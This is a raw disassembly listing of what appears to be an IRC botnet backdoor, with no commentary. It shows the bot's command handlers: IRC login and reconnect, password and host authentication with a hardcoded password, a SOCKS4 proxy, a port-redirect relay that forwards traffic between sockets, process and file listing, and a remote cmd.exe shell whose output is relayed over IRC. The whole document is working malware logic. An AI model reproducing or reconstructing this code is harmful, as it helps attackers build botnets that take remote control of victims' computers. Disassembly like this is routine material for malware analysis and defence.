push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4]
call sub_4083E7
push offset aMainDisconnect ; "[MAIN]: Disconnecting."
call sub_4035E1
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_40C97F
; ---------------------------------------------------------------------------
loc_41223A: ; CODE XREF: sub_40C50A+125A�j
; sub_40C50A+126F�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_4083E7
push offset aMainReconnecti ; "[MAIN]: Reconnecting."
call sub_4035E1
add esp, 0Ch
xor eax, eax
jmp loc_40C97F
; ---------------------------------------------------------------------------
loc_41225B: ; CODE XREF: sub_40C50A+1230�j
; sub_40C50A+1245�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_402853
jmp loc_410681
; ---------------------------------------------------------------------------
loc_412271: ; CODE XREF: sub_40C50A+118B�j
; sub_40C50A+11A0�j
push [ebp+esi+var_90]
push 1Eh
push offset aProcessList ; "Process list"
push offset aProc ; "[PROC]"
jmp short loc_412299
; ---------------------------------------------------------------------------
loc_412286: ; CODE XREF: sub_40C50A+1161�j
; sub_40C50A+1176�j
push [ebp+esi+var_90]
push 1Bh
push offset aFindFile ; "Find file"
push offset aFindfile_0 ; "[FINDFILE]"
loc_412299: ; CODE XREF: sub_40C50A+FDC�j
; sub_40C50A+1005�j ...
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_416479
add esp, 20h
jmp loc_40C97C
; ---------------------------------------------------------------------------
loc_4122B5: ; CODE XREF: sub_40C50A+F9D�j
; sub_40C50A+FB2�j
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz short loc_4122D4
push edi
call sub_4195F0
test eax, eax
pop ecx
jz short loc_4122D4
push edi
call sub_4195F0
pop ecx
jmp short loc_4122D9
; ---------------------------------------------------------------------------
loc_4122D4: ; CODE XREF: sub_40C50A+5DB4�j
; sub_40C50A+5DBF�j
mov eax, dword_43E19C
loc_4122D9: ; CODE XREF: sub_40C50A+5DC8�j
mov esi, [ebp+esi+var_8C]
mov [ebp+var_478], eax
cmp esi, ebx
jz short loc_4122FE
push esi
loc_4122EB: ; CODE XREF: sub_40C50A+5E03�j
lea eax, [ebp+var_488]
push 10h
push eax
call sub_418EF0
add esp, 0Ch
jmp short loc_412315
; ---------------------------------------------------------------------------
loc_4122FE: ; CODE XREF: sub_40C50A+5DDE�j
cmp [ebp+var_9C7], bl
jz short loc_41230F
lea eax, [ebp+var_D4]
push eax
jmp short loc_4122EB
; ---------------------------------------------------------------------------
loc_41230F: ; CODE XREF: sub_40C50A+5DFA�j
mov [ebp+var_488], bl
loc_412315: ; CODE XREF: sub_40C50A+5DF2�j
mov eax, [ebp+var_4]
push [ebp+var_8C]
mov esi, [ebp+arg_4]
mov [ebp+var_46C], eax
mov eax, [ebp+var_8]
push 80h
mov [ebp+var_468], eax
lea eax, [ebp+var_508]
push eax
mov [ebp+var_50C], esi
call sub_418EF0
add esp, 0Ch
push [ebp+var_478]
push esi
call sub_40AFEC
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset aSocks4ServerSt ; "[SOCKS4]: Server started on: %s:%d."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 11h
push eax
call sub_4161EB
add esp, 1Ch
mov [ebp+var_474], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_50C]
push ebx
push eax
push offset sub_414902
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_474]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_4123C6
loc_4123B0: ; CODE XREF: sub_40C50A+5EBA�j
cmp [ebp+var_464], ebx
jnz loc_40C97C
push 32h
call ds:dword_4942D8
jmp short loc_4123B0
; ---------------------------------------------------------------------------
loc_4123C6: ; CODE XREF: sub_40C50A+5EA4�j
call ds:dword_4942F0
push eax
push offset aSocks4FailedTo ; "[SOCKS4]: Failed to start server thread"...
jmp loc_4127C2
; ---------------------------------------------------------------------------
loc_4123D7: ; CODE XREF: sub_40C50A+F49�j
; sub_40C50A+F5E�j ...
push edi
push offset aSecure_2 ; "secure"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_4123FF
push edi
push offset aSec_0 ; "sec"
call sub_419360
pop ecx
mov [ebp+var_46C], ebx
test eax, eax
pop ecx
jnz short loc_412409
loc_4123FF: ; CODE XREF: sub_40C50A+5EDC�j
mov [ebp+var_46C], 1
loc_412409: ; CODE XREF: sub_40C50A+5EF3�j
push [ebp+var_8C]
lea eax, [ebp+var_4F0]
push 80h
push eax
call sub_418EF0
mov eax, [ebp+arg_4]
add esp, 0Ch
cmp [ebp+var_46C], ebx
mov [ebp+var_4F4], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
mov [ebp+var_464], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_412450
mov eax, offset aUnsecuring ; "Unsecuring"
loc_412450: ; CODE XREF: sub_40C50A+5F3F�j
push eax
push offset aSecureSSystem_ ; "[SECURE]: %s system."
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_418EF0
push ebx
lea eax, [ebp+var_2DC]
push 19h
push eax
call sub_4161EB
add esp, 1Ch
mov [ebp+var_470], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset sub_413AD1
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_470]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_4124C4
loc_4124AE: ; CODE XREF: sub_40C50A+5FB8�j
cmp [ebp+var_460], ebx
jnz loc_40EFB5
push 32h
call ds:dword_4942D8
jmp short loc_4124AE
; ---------------------------------------------------------------------------
loc_4124C4: ; CODE XREF: sub_40C50A+5FA2�j
call ds:dword_4942F0
push eax
push offset aSecureFailed_0 ; "[SECURE]: Failed to start secure thread"...
loc_4124D0: ; CODE XREF: sub_40C50A+3DA5�j
; sub_40C50A+4ACF�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
add esp, 0Ch
jmp loc_40EFB5
; ---------------------------------------------------------------------------
loc_4124E4: ; CODE XREF: sub_40C50A+F1F�j
; sub_40C50A+F34�j
push offset aFenr_0 ; "FEnR"
push offset aMainS ; "[MAIN]: %s"
loc_4124EE: ; CODE XREF: sub_40C50A+486F�j
; sub_40C50A+4B83�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
loc_4124FA: ; CODE XREF: sub_40C50A+570C�j
add esp, 0Ch
jmp loc_40E760
; ---------------------------------------------------------------------------
loc_412502: ; CODE XREF: sub_40C50A+EF5�j
; sub_40C50A+F0A�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_412559
push esi
call sub_4195F0
cmp eax, ebx
pop ecx
jl short loc_412551
cmp eax, 2
jge short loc_412551
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
cmp [ecx+edx], bl
lea esi, [ecx+edx]
jz short loc_412549
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2DC]
push offset aMainUserSLog_1 ; "[MAIN]: User %s logged out."
push eax
call sub_418D70
add esp, 0Ch
mov [esi], bl
jmp short loc_4125A2
; ---------------------------------------------------------------------------
loc_412549: ; CODE XREF: sub_40C50A+6021�j
push eax
push offset aMainNoUserLogg ; "[MAIN]: No user logged in at slot: %d."
jmp short loc_412593
; ---------------------------------------------------------------------------
loc_412551: ; CODE XREF: sub_40C50A+600C�j
; sub_40C50A+6011�j
push eax
push offset aMainInvalidLog ; "[MAIN]: Invalid login slot number: %d."
jmp short loc_412593
; ---------------------------------------------------------------------------
loc_412559: ; CODE XREF: sub_40C50A+6001�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_41255E: ; CODE XREF: sub_40C50A+6070�j
push [ebp+var_94]
push edi
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_41257E
inc esi
add edi, 80h
cmp esi, 2
jl short loc_41255E
jmp short loc_4125A2
; ---------------------------------------------------------------------------
loc_41257E: ; CODE XREF: sub_40C50A+6064�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_D4]
push eax
push offset aMainUserSLog_2 ; "[MAIN]: User %s logged out."
loc_412593: ; CODE XREF: sub_40C50A+1CDE�j
; sub_40C50A+1D0C�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
add esp, 0Ch
loc_4125A2: ; CODE XREF: sub_40C50A+1CC2�j
; sub_40C50A+1CF2�j ...
cmp [ebp+var_8], ebx
jnz loc_40CE3C
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 14h
jmp loc_40CE3C
; ---------------------------------------------------------------------------
loc_4125CC: ; CODE XREF: sub_40C50A+ECB�j
; sub_40C50A+EE0�j
push [ebp+var_90]
push offset a332_4 ; "332"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_41263B
call sub_4163B4
push ebx
call ds:dword_49432C
loc_4125EE: ; CODE XREF: sub_40C50A+EA1�j
; sub_40C50A+EB6�j
push [ebp+esi+var_90]
xor eax, eax
cmp [ebp+var_9B8], bl
setnz al
push eax
lea eax, [ebp+var_928]
push dword_43E1C0
push eax
call sub_4138AA
lea eax, [ebp+var_928]
push eax
push offset aNickS_3 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_4083E7
lea eax, [ebp+var_928]
push eax
push offset aMainRandomNick ; "[MAIN]: Random nick change: %s"
call sub_403655
loc_412638: ; CODE XREF: sub_40C50A+2C10�j
add esp, 24h
loc_41263B: ; CODE XREF: sub_40C50A+632�j
; sub_40C50A+63E�j ...
mov eax, [ebp+arg_24]
jmp loc_40C97F
; ---------------------------------------------------------------------------
loc_412643: ; CODE XREF: sub_40C50A+A9D�j
; sub_40C50A+AB2�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
mov [ebp+arg_0], esi
jz loc_40C97C
cmp [ebp+var_B8], ebx
jnz loc_40C97C
push offset asc_43F0B8 ; "!"
push [ebp+var_94]
call sub_419890
mov esi, eax
push offset dword_491D78
push ebx
inc esi
call sub_419890
push offset asc_43F0BC ; "~"
push eax
call sub_419890
push [ebp+arg_0]
mov edi, eax
push offset a19736666386888 ; "19736666386888"
call sub_419360
add esp, 20h
test eax, eax
jz short loc_4126D9
lea eax, [ebp+var_D4]
push edi
push eax
lea eax, [ebp+var_D4]
push eax
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_4083E7
lea eax, [ebp+var_D4]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_4083E7
push edi
push esi
push offset aMainFailedPass ; "[MAIN]: *Failed pass auth by: (%s!%s)."
jmp short loc_412735
; ---------------------------------------------------------------------------
loc_4126D9: ; CODE XREF: sub_40C50A+6194�j
mov [ebp+arg_24], offset off_43E268
loc_4126E0: ; CODE XREF: sub_40C50A+61F2�j
mov eax, [ebp+arg_24]
push edi
push dword ptr [eax]
call sub_41676E
pop ecx
test eax, eax
pop ecx
jnz short loc_412749
add [ebp+arg_24], 4
cmp [ebp+arg_24], offset off_43E26C
jl short loc_4126E0
lea eax, [ebp+var_D4]
push edi
push eax
lea eax, [ebp+var_D4]
push eax
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_4083E7
lea eax, [ebp+var_D4]
push eax
push offset aNoticeSYourA_0 ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_4083E7
push edi
push esi
push offset aMainFailedHost ; "[MAIN]: *Failed host auth by: (%s!%s)."
loc_412735: ; CODE XREF: sub_40C50A+61CD�j
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
add esp, 30h
jmp loc_40CE3C
; ---------------------------------------------------------------------------
loc_412749: ; CODE XREF: sub_40C50A+61E5�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_41274E: ; CODE XREF: sub_40C50A+626E�j
cmp [ebp+arg_0], ebx
jz loc_40C97C
cmp [edi], bl
jnz short loc_41276E
push [ebp+arg_0]
push offset a19736666386888 ; "19736666386888"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_41277F
loc_41276E: ; CODE XREF: sub_40C50A+624F�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_41274E
jmp loc_40C97C
; ---------------------------------------------------------------------------
loc_41277F: ; CODE XREF: sub_40C50A+6262�j
shl esi, 7
add esi, [ebp+arg_18]
lea eax, [ebp+var_AA8]
push 7Fh
push eax
push esi
call sub_4191A0
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_4127B6
push ebx
push [ebp+var_4]
push offset aMainPasswordAc ; "[MAIN]: Password accepted."
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 14h
loc_4127B6: ; CODE XREF: sub_40C50A+6290�j
lea eax, [ebp+var_D4]
push eax
push offset aMainUserSLog_3 ; "[MAIN]: User: %s logged in."
loc_4127C2: ; CODE XREF: sub_40C50A+59B�j
; sub_40C50A+5B3B�j ...
call sub_403655
loc_4127C7: ; CODE XREF: sub_40C50A+17CE�j
pop ecx
loc_4127C8: ; CODE XREF: sub_40C50A+2AB7�j
pop ecx
jmp loc_40C97C
; ---------------------------------------------------------------------------
loc_4127CE: ; CODE XREF: sub_40C50A+205�j
; sub_40C50A+21A�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_4083E7
push offset asc_43E250 ; "+x"
push [ebp+arg_10]
push offset aModeSS ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_4083E7
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS_4 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_4083E7
add esp, 2Ch
mov dword_491D68, edi
jmp loc_40C79E
sub_40C50A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412814 proc near ; DATA XREF: sub_40C50A+36E7�o
var_34C = byte ptr -34Ch
var_14C = byte ptr -14Ch
var_148 = dword ptr -148h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
rep movsd
push 1
xor esi, esi
pop edi
push 10h
mov [eax+120h], edi
pop ebx
lea eax, [ebp+var_10]
push ebx
push esi
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_40]
call dword_44B6C0 ; htons
push 6
push edi
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], esi
mov [ebp+arg_0], ebx
call dword_44B740 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_412978
mov eax, [ebp+var_3C]
push edi
imul eax, 234h
push 401h
push esi
push ebx
mov dword_44D064[eax], ebx
call dword_44B5DC ; WSAAsyncSelect
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call dword_44B6EC ; bind
test eax, eax
jnz loc_412978
push 0Ah
push ebx
call dword_44B6E8 ; listen
test eax, eax
jnz loc_412978
loc_4128BE: ; CODE XREF: sub_412814+BE�j
; sub_412814+13F�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_24]
push eax
push ebx
call dword_44B754 ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4128BE
movzx eax, [ebp+var_22]
push [ebp+var_3C]
mov [ebp+var_148], edi
mov [ebp+var_2C], esi
push eax
push [ebp+var_20]
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_34C]
push offset aRedirectClient ; "[REDIRECT]: Client connection from IP: "...
push eax
call sub_418D70
push edi
lea eax, [ebp+var_34C]
push 10h
push eax
call sub_4161EB
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov dword_44D05C[eax], ecx
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_14C]
push esi
push eax
push offset sub_41299C
push esi
push esi
call ds:dword_4942F4
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_44D06C[ecx], eax
jz short loc_412963
loc_412950: ; CODE XREF: sub_412814+14D�j
cmp [ebp+var_2C], esi
jnz loc_4128BE
push 32h
call ds:dword_4942D8
jmp short loc_412950
; ---------------------------------------------------------------------------
loc_412963: ; CODE XREF: sub_412814+13A�j
call ds:dword_4942F0
push eax
push offset aRedirectFail_0 ; "[REDIRECT]: Failed to start client thre"...
call sub_403655
pop ecx
pop ecx
jmp short loc_41297B
; ---------------------------------------------------------------------------
loc_412978: ; CODE XREF: sub_412814+61�j
; sub_412814+93�j ...
mov edi, [ebp+arg_0]
loc_41297B: ; CODE XREF: sub_412814+162�j
push edi
call dword_44B758 ; closesocket
push ebx
call dword_44B758 ; closesocket
push [ebp+var_3C]
call sub_416507
pop ecx
push esi
call ds:dword_4942FC
pop edi
pop esi
pop ebx
sub_412814 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41299C proc near ; DATA XREF: sub_412814+11C�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_418D40
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
mov ebx, [ebp+var_30]
push 1
pop ecx
mov [ebp+var_4], ebx
push 6
push ecx
push 2
mov [eax+120h], ecx
call dword_44B740 ; socket
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_412B52
push 10h
lea eax, [ebp+var_18]
push edi
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_18], 2
push [ebp+var_3C]
call dword_44B6C0 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call dword_44B700 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_412A2C
lea eax, [ebp+var_13C]
push eax
call dword_44B744 ; gethostbyname
jmp short loc_412A3A
; ---------------------------------------------------------------------------
loc_412A2C: ; CODE XREF: sub_41299C+7F�j
push 2
lea eax, [ebp+var_8]
push 4
push eax
call dword_44B678 ; gethostbyaddr
loc_412A3A: ; CODE XREF: sub_41299C+8E�j
cmp eax, edi
jz loc_412B52
mov eax, [eax+0Ch]
push 10h
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push eax
push esi
call dword_44B668 ; connect
cmp eax, 0FFFFFFFFh
jz loc_412B52
movzx eax, [ebp+var_16]
push [ebp+var_34]
mov [ebp+var_20], edi
push eax
push [ebp+var_14]
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_344]
push offset aRedirectClie_0 ; "[REDIRECT]: Client connection to IP: %s"...
push eax
call sub_418D70
push esi
lea eax, [ebp+var_344]
push 10h
push eax
call sub_4161EB
imul ebx, 234h
mov [ebp+var_30], eax
imul eax, 234h
mov ecx, [ebp+var_34]
lea esi, dword_44D064[ebx]
mov dword_44D05C[eax], ecx
add esp, 20h
mov ecx, [esi]
mov dword_44D068[eax], ecx
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_144]
push edi
push eax
push offset sub_412B83
push edi
push edi
call ds:dword_4942F4
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, edi
mov dword_44D06C[ecx], eax
jz short loc_412B3F
loc_412AEC: ; CODE XREF: sub_41299C+15D�j
cmp [ebp+var_20], edi
jnz short loc_412AFB
push 32h
call ds:dword_4942D8
jmp short loc_412AEC
; ---------------------------------------------------------------------------
loc_412AFB: ; CODE XREF: sub_41299C+153�j
mov ebx, 1000h
loc_412B00: ; CODE XREF: sub_41299C+19F�j
push ebx
lea eax, [ebp+var_1344]
push edi
push eax
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+var_1344]
push edi
push ebx
push eax
push dword ptr [esi]
call dword_44B6D8 ; recv
cmp eax, edi
jle short loc_412B52
push edi
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_412B00
jmp short loc_412B52
; ---------------------------------------------------------------------------
loc_412B3F: ; CODE XREF: sub_41299C+14E�j
call ds:dword_4942F0
push eax
push offset aRedirectFail_1 ; "[REDIRECT]: Failed to start connection "...
call sub_403655
pop ecx
pop ecx
loc_412B52: ; CODE XREF: sub_41299C+44�j
; sub_41299C+A0�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push dword_44D064[eax]
call dword_44B758 ; closesocket
push [ebp+arg_0]
call dword_44B758 ; closesocket
push [ebp+var_4]
call sub_416507
pop ecx
push edi
call ds:dword_4942FC
pop edi
pop esi
pop ebx
sub_41299C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412B83 proc near ; DATA XREF: sub_41299C+130�o
var_1128 = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call sub_418D40
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov edi, 1000h
loc_412BBA: ; CODE XREF: sub_412B83+7C�j
push edi
lea eax, [ebp+var_1128]
push 0
push eax
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+var_1128]
push 0
push edi
push eax
push dword_44D068[esi]
call dword_44B6D8 ; recv
test eax, eax
jle short loc_412C01
push 0
push eax
lea eax, [ebp+var_1128]
push eax
push dword_44D064[esi]
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_412BBA
loc_412C01: ; CODE XREF: sub_412B83+61�j
push dword_44D068[esi]
call dword_44B758 ; closesocket
push [ebp+var_14]
call sub_416507
pop ecx
push 0
call ds:dword_4942FC
pop edi
pop esi
sub_412B83 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_412C20 proc near ; CODE XREF: sub_412C50+2A�p
; sub_412C88+7E�p ...
mov eax, dword_491D94
push esi
mov esi, ds:dword_4942E0
cmp eax, 0FFFFFFFFh
jz short loc_412C34
push eax
call esi
loc_412C34: ; CODE XREF: sub_412C20+F�j
mov eax, dword_491D9C
cmp eax, 0FFFFFFFFh
jz short loc_412C41
push eax
call esi
loc_412C41: ; CODE XREF: sub_412C20+1C�j
mov eax, dword_491D90
cmp eax, 0FFFFFFFFh
jz short loc_412C4E
push eax
call esi
loc_412C4E: ; CODE XREF: sub_412C20+29�j
pop esi
retn
sub_412C20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412C50 proc near ; CODE XREF: sub_40449C+14A�p
; sub_40C50A+489E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_418E70
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+arg_0]
push dword_491D98
call ds:dword_4942E4
test eax, eax
jnz short loc_412C83
call sub_412C20
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_412C83: ; CODE XREF: sub_412C50+28�j
push 1
pop eax
leave
retn
sub_412C50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412C88 proc near ; CODE XREF: sub_412D0F+D3�p
; sub_412D0F+F2�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push offset dword_491DDC
push [ebp+arg_4]
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_412CCB
push 7D0h
call ds:dword_4942D8
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r"
push eax
call sub_418D70
add esp, 10h
jmp short loc_412CE2
; ---------------------------------------------------------------------------
loc_412CCB: ; CODE XREF: sub_412C88+1A�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset aS_31 ; "%s"
push eax
call sub_418D70
add esp, 0Ch
loc_412CE2: ; CODE XREF: sub_412C88+41�j
lea eax, [ebp+var_200]
push 0
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_44B710 ; send
test eax, eax
jg short loc_412D0B
call sub_412C20
loc_412D0B: ; CODE XREF: sub_412C88+7C�j
xor eax, eax
leave
retn
sub_412C88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D0F proc near ; DATA XREF: sub_412E64+174�o
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov esi, 200h
xor edi, edi
mov ebx, offset dword_491DA0
loc_412D27: ; CODE XREF: sub_412D0F+79�j
; sub_412D0F+DB�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+var_4]
push edi
push edi
push eax
lea eax, [ebp+var_20C]
push esi
push eax
push dword_491D94
call ds:dword_4943E0
test eax, eax
jz loc_412DF5
cmp [ebp+var_4], edi
jnz short loc_412D8A
lea eax, [ebp+var_8]
push eax
push dword_491D90
call ds:dword_4943DC
test eax, eax
jz short loc_412D80
cmp [ebp+var_8], 103h
jnz loc_412E19
loc_412D80: ; CODE XREF: sub_412D0F+62�j
push 0Ah
call ds:dword_4942D8
jmp short loc_412D27
; ---------------------------------------------------------------------------
loc_412D8A: ; CODE XREF: sub_412D0F+4E�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_412DA1
loc_412D91: ; CODE XREF: sub_412D0F+90�j
cmp [ebp+eax+var_20C], 0Ah
jz short loc_412DEF
inc eax
cmp eax, [ebp+var_4]
jb short loc_412D91
loc_412DA1: ; CODE XREF: sub_412D0F+80�j
mov [ebp+var_4], esi
loc_412DA4: ; CODE XREF: sub_412D0F+E4�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+var_4]
lea eax, [ebp+var_20C]
push eax
push dword_491D94
call ds:dword_4942DC
test eax, eax
jz short loc_412E41
lea eax, [ebp+var_20C]
push eax
push ebx
push dword_491DD4
call sub_412C88
add esp, 0Ch
jmp loc_412D27
; ---------------------------------------------------------------------------
loc_412DEF: ; CODE XREF: sub_412D0F+8A�j
inc eax
mov [ebp+var_4], eax
jmp short loc_412DA4
; ---------------------------------------------------------------------------
loc_412DF5: ; CODE XREF: sub_412D0F+45�j
push offset aCmdCouldNotRea ; "[CMD]: Could not read data from procces"...
push ebx
push dword_491DD4
call sub_412C88
push [ebp+arg_0]
call sub_416507
add esp, 10h
push 1
call ds:dword_4942FC
loc_412E19: ; CODE XREF: sub_412D0F+6B�j
call sub_412C20
push offset aCmdProccessHas ; "[CMD]: Proccess has terminated.\r\n"
push ebx
push dword_491DD4
call sub_412C88
push [ebp+arg_0]
call sub_416507
add esp, 10h
push edi
call ds:dword_4942FC
loc_412E41: ; CODE XREF: sub_412D0F+C3�j
push offset aCmdCouldNotR_0 ; "[CMD]: Could not read data from procces"...
push ebx
push dword_491DD4
call sub_412C88
push [ebp+arg_0]
call sub_416507
add esp, 10h
push edi
call ds:dword_4942FC
sub_412D0F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412E64 proc near ; CODE XREF: sub_40449C+99�p
; sub_40C50A+5775�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push esi
push edi
call sub_412C20
xor esi, esi
lea eax, [ebp+var_178]
push esi
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call dword_44B77C ; SearchPathA
test eax, eax
jz loc_412F5E
lea eax, [ebp+var_1C]
mov edi, ds:dword_4943E8
push esi
push eax
lea eax, [ebp+var_C]
mov [ebp+var_1C], 0Ch
push eax
